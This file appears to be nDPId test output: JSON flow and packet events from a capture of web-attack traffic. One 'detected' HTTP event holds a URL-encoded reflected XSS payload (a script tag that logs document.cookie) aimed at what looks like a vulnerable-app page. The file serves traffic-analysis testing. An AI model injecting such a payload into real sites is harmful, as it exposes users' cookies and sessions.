-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1499347163177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0\/zGVu0LnLnGcaAScSBQzAAAAgQFtAQCCAoD43hLATmm1QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":3,"flow_last_seen":1499347163178,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347163178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YKZAAD4GZTKsEAABwKgKMtP8AFCcucZxxlbtDIAQAOXv0wAAAQEICgE5ptUD43hL"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347164459,"flow_last_seen":1499347164459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347164459,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1499347164459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347164459,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yU1AAD4G\/IKsEAABwKgKMtQKAFBoaGFbAAAAAKACchAXlgAAAgQFtAQCCAoBOagWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1499347164459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347164459,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ArCPOEyaGhhXKAScSD3lQAAAgQFtAQCCAoD43mMATmoFgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1499347164460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347164460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yU5AAD4G\/ImsEAABwKgKMtQKAFBoaGFcwjzhM4AQAOWWnQAAAQEICgE5qBYD43mM"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347165741,"flow_last_seen":1499347165741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347165741,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1499347165741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vRVAAD4GCLusEAABwKgKMtQYAFCo9hRDAAAAAKACchAi0gAAAgQFtAQCCAoBOalWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1499347165741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1BjYjd6VqPYURKAScSDt3QAAAgQFtAQCCAoD43rMATmpVgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1499347165742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347165742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vRZAAD4GCMKsEAABwKgKMtQYAFCo9hRE2I3eloAQAOWM5QAAAQEICgE5qVYD43rM"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347168302,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347168302,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pdZAAD4GH\/qsEAABwKgKMtQyAFAP+Q4AAAAAAKACchC\/eAAAAgQFtAQCCAoBOavWAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1DJusJVZD\/kOAaAScSA7HQAAAgQFtAQCCAoD431NATmr1gEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1499347168303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347168303,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pddAAD4GIAGsEAABwKgKMtQyAFAP+Q4BbrCVWoAQAOXaIwAAAQEICgE5q9cD431N"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347169573,"flow_last_seen":1499347169573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347169573,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1499347169573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347169573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83TtAAD4G6JSsEAABwKgKMtRAAFDvZ3AvAAAAAKACchB8jgAAAgQFtAQCCAoBOa0UAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1499347169574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347169574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1EA8SVzP72dwMKAScSBh5gAAAgQFtAQCCAoD436LATmtFAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1499347169574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347169574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TxAAD4G6JusEAABwKgKMtRAAFDvZ3AwPElc0IAQAOUA7gAAAQEICgE5rRQD436L"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347172098,"flow_last_seen":1499347172098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347172098,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1499347172098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347172098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dk5AAD4GT4KsEAABwKgKMtRaAFDNItnFAAAAAKACchAyrAAAAgQFtAQCCAoBOa+LAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1499347172098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347172098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1FoQ75vBzSLZxqAScSAB9QAAAgQFtAQCCAoD44ECATmviwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1499347172099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347172099,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dk9AAD4GT4msEAABwKgKMtRaAFDNItnGEO+bwoAQAOWg\/AAAAQEICgE5r4sD44EC"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347173373,"flow_last_seen":1499347173373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347173373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1499347173373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347173373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XK1AAD4GaSOsEAABwKgKMtRoAFDpcOxnAAAAAKACchACbwAAAgQFtAQCCAoBObDKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1499347173373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347173373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1GhwCsiK6XDsaKAScSBElAAAAgQFtAQCCAoD44JBATmwygEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1499347173374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347173374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XK5AAD4GaSqsEAABwKgKMtRoAFDpcOxocArIi4AQAOXjmwAAAQEICgE5sMoD44JB"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347174667,"flow_last_seen":1499347174667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347174667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1499347174667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347174667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LxxAAD4GlrSsEAABwKgKMtR2AFATHZ0RAAAAAKACchAmyAAAAgQFtAQCCAoBObINAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1499347174667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347174667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1HZkheFBEx2dEqAScSBaeAAAAgQFtAQCCAoD44OEATmyDQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1499347174668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347174668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Lx1AAD4GlrusEAABwKgKMtR2AFATHZ0SZIXhQoAQAOX5fgAAAQEICgE5sg4D44OE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1747,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347177248,"flow_last_seen":1499347177248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347177248,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1747,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1499347177248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347177248,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XzZAAD4GZpqsEAABwKgKMtSQAFC5seulAAAAAKACchAu\/wAAAgQFtAQCCAoBObSTAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1499347177248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347177248,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1JDtsXHRubHrpqAScSBGbgAAAgQFtAQCCAoD44YJATm0kwEDAwc="} 